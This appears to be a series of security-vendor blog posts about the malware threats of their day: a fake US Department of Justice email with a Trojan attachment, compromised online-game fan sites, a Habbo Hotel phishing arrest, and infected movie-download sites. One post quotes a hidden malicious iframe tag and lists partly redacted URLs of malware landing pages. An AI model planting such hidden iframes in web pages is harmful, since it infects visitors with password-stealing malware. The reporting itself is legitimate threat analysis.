VIP? Not in a fraudster’s vocabulary. Fraudsters choose no person, date or time when to release their attacks. US Department of Justice (USDOJ) is never an exception of getting victimized by fraud spammers.

There is a spam email message that is circulating the Web resembling the authentic USDOJ letterhead where the hoax message is written. Bearing the USDOJ logo, an unsuspecting recipient could be deceived to believe that the email is legitimate.

The message disturbs the recipient by saying that a complaint to the US Dept. of Justice has been filed against the recipient’s company. A copy of the complaint is attached to the mail. The recipient, getting shocked of the email, would then open the attached document.

What the recipient does not know is that the file attached is actually a Trojan downloader detected by Trend Micro as TROJ_DLOADER.QRQ. When executed, this Trojan also drops several malicious files, including TROJ_RUNDIS.H and TROJ_AGENT.ADCU.

People have to be triple cautious about email messages. Without an antivirus software and other proactive security measures (such as Web reputation/Web blocking services), only personal discretion would save or bring one to malware danger.

This applies to all, no VIP treatments on this department.

In the online gaming world, MMORPGs (Massively Multiplayer Online Role-playing Games) are the most popular worldwide, exceeding 15 million users in 2006 and earning billions of dollars in revenue to date. It’s a booming business, no doubt. This is why a lot of MMORPG sites that offer various services to help players boost their character abilities have been mushrooming in every corner of the Web world. This is also why these sites have been a favorite target by malicious users.

Such is the case for Gameige.com. This Web site offers power leveling services (such as upgrade of a player’s game character, skills, level and etc…) for popular online games such as World of Warcraft (WoW), Lord of the Rings, Lineage2, EverQuest.

Earlier today, Trend Micro Threat Analyst Jonell Baltazar reports that Gameige.com has been compromised to contain several malicious iFrames leading to the download of several Trojans and spyware programs.

When the said MMPORGP site is accessed, it opens the following Web pages:

• http://www.{BLOCKED}g.org/download/text/1.htm
• http://www.{BLOCKED}g.org/download/text/2.htm
• http://www.{BLOCKED}g.org/download/text/3.htm
• http://www.{BLOCKED}cx.cn/wm.htm?id=823
• http://www.{BLOCKED}anyu.net/noopxp/oo/ico.gif?1717

These Web pages house a bunch of exploit codes, which in turn downloads various malware, such as the following, among other generic packers and information-stealers:

• TSPY_ONLINEG.IRZ
• TSPY_ONLINEG.ISZ
• TSPY_ONLINEG.LKC
• TROJ_UPACK.AG
• PE_LOOKED.GEN
• WORM_DLOADER.TCG

Note that as of this writing, the Web sites may still be active. The exploit takes advantage of the Microsoft Data Access Components (MS06-014) and BaoFeng Storm ActiveX Controls Multiple Remote Buffer Overflow vulnerabilities in order to download these malicious programs.

A page in the site dedicated for fans of the World of Warcraft MMORPG seems to be compromised (Warning: malware code still active as of this writing):

• http://wow.gameamp.com/info/showRaces

The said page has hidden iFrames embedded in several parts:

<iframe height=”1″ width=”0″
src=”http://{BLOCKED}1%33%31%37%35/1.htm”></iframe>

The iFrame’s landing page, when deobfuscated, points to

• http://{BLOCKED}175.com/1.htm

The iFrame code eventually results to a download of the following file:

• http://www.{BLOCKED}175.com/88.exe

…which is a password-stealer for online games. Fortunately, Trend Micro already blocks these malicious sites with its Web reputation services.

Online games have long been targeted by malware, mainly due to the thriving virtual economy underlying them. The daily exchange of virtual goods for real money between avid players can indeed spell profit for malware authors, and fan sites are the perfect portal for relaying these password-stealing malware.

Online players should then be on their guard — both inside the game and outside it. Safe looking sites do not guarantee safety, and the malware enemy can strike anywhere… ready for the kill.

Stealing login information from online games and other social networking sites is old news. Because it’s so common, it doesn’t seem to be much of a big deal. However, when real money is involved and people get arrested, that’s when things get messy.

Just recently, a Dutch teenager was arrested for stealing almost $6000 worth of virtual furniture from users of the Habbo Hotel, a teenage chat room and gaming Web site.

The concept of Habbo Hotel is that virtual furniture is purchased and/or traded by the community members in order to furnish their respective “hotel rooms”. Purchasing and trading are made possible through “credits”, which are paid with real money.

According to the site’s owner, fake Habbo Web sites were created, drawing players to access them. The visitors’ user names and passwords were then collected from these spoofed sites in order for the hackers to access the real user accounts on the real Habbo Web site. Virtual furniture was then stolen from the victims’ accounts, hence also collecting cold, hard cash.

This kind of phishing attack serves as a caution, not only to Habbo users, but all Internet users who spend real money on the Net, especially on virtual exchanges. Shelling out money to people we can’t see is never safe. The moolah is sure better spent on furniture that we can actually sit or lie on. Nothing beats the real thing.

Caution, indeed, seems to be the operative word when it comes to “Lust, Caution”–a sexually graphic espionage movie set in World War II Shanghai. It has been receiving good reviews from around the world, winning the top award at the recent Venice Film Festival, and reaping millions of dollars despite the fact that its China release was cut short by director Ang Lee (”Brokeback Mountain”) himself in keeping with the Chinese censorship rules. News of Chinese moviegoers suing their film censor over the edited version also hit the media.

However, the “Lust, Caution” buzz does not stop there. Recently, a Chinese antivirus company has reported that hackers embedded viruses into a significant number of sites, which offers free downloads of the movie.

The censorship move may have just further fueled the attraction of downloading free copies from infected Web sites, especially those in China. With a host of Web sites offering free movie downloads, computer users are warned to be cautious in downloading as they might unwittingly compromise their machines. An engineer from the Rising International Software Co. Ltd. in China reportedly encountered the virus last week. He was left with a blank screen and his instant messaging password was stolen.

Malicious users are indeed striking where the iron is hot. As “Lust, Caution” blazes a steamy trail to success, these embedded viruses may continue to make rounds not only in China but in other countries as well. Users must try to resist the combined attraction of sex, espionage, and Ang Lee–especially because viruses are in the mix.